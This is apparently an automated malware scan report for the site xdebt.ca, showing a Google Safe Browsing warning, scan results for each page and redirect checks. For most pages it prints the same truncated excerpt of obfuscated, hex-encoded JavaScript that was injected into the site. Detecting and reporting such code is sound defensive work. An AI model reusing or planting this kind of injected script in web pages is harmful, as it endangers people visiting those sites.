Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=xdebt.ca
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://xdebt.ca/ | 200 OK Content-Length: 111872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports:
| ||
http://xdebt.ca/index.php | 200 OK Content-Length: 111872 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports:
| ||
http://xdebt.ca/your_debt_options.php | 200 OK Content-Length: 122661 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports:
| ||
http://xdebt.ca/ /about_us.php | 404 Not Found Content-Length: 52 Content-Type: text/html | clean |
http://xdebt.ca/test404page.js | 404 Not Found Content-Length: 52 Content-Type: text/html | clean |
http://xdebt.ca/faq.php | 200 OK Content-Length: 120131 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports:
| ||
http://xdebt.ca/testimonials.php | 200 OK Content-Length: 106345 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports:
| ||
http://xdebt.ca/contactus.php | 200 OK Content-Length: 108799 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports:
| ||
http://xdebt.ca/login.php | 200 OK Content-Length: 106339 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports:
| ||
http://xdebt.ca/disclaimer.php | 200 OK Content-Length: 106329 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports:
| ||
http://xdebt.ca/privacy.php | 200 OK Content-Length: 106333 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if('gOVg'=='NPJtYx')PAfb='zwQpu';if('oRYpTH'=='iRoPo')TvdW();var fdqQWQ='icOv';var WWPLEwZA="\x63o\x6estructor";function yiLr(){var OzLZ='tbOl';if('WDPjE'=='BPAv')UkbhUB();}if('IOCv'=='SYHP')TRiFZ();var UWBBomP="b\x6f\x64\x79";var DRLQ=176;if('ZmfNAH'=='QmEUPo')nXBG();var appVersion_var="\x61\x70pVers\x69on";var JKrs='ESYWGA';if('lHHARy'=='TGNq')XXCve();var px0_var="0px";if('ERLVT'=='ciDl')VgFX();var iItnGx;var tjvkkGonF="a3afafab756a6aa19cada89ca9aba3aaafaa70747169a4a9a1aa6aa4a9699ea2a47a72";va function PHSqo(){}} var TLfq=136;var wDJBt=222;fjTef();var CaebJ='HStBt';function rquME(){var EsYJAB='Nbdc';if('rmBFb'=='wPZR')AFKjv();} var kfDiF;function SVkFN(){}var vbEmYT='pFRMW'; Antivirus reports:
|
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: xdebt.ca
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 07:42:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
GET / HTTP/1.1
Host: xdebt.ca
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 07:42:33 GMT
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Second query (visit from search engine):
GET / HTTP/1.1
Host: xdebt.ca
Referer: http://www.google.com/search?q=xdebt.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: xdebt.ca
Referer: http://www.google.com/search?q=xdebt.ca
Result:
The result is similar to the first query. There are no suspicious redirects found.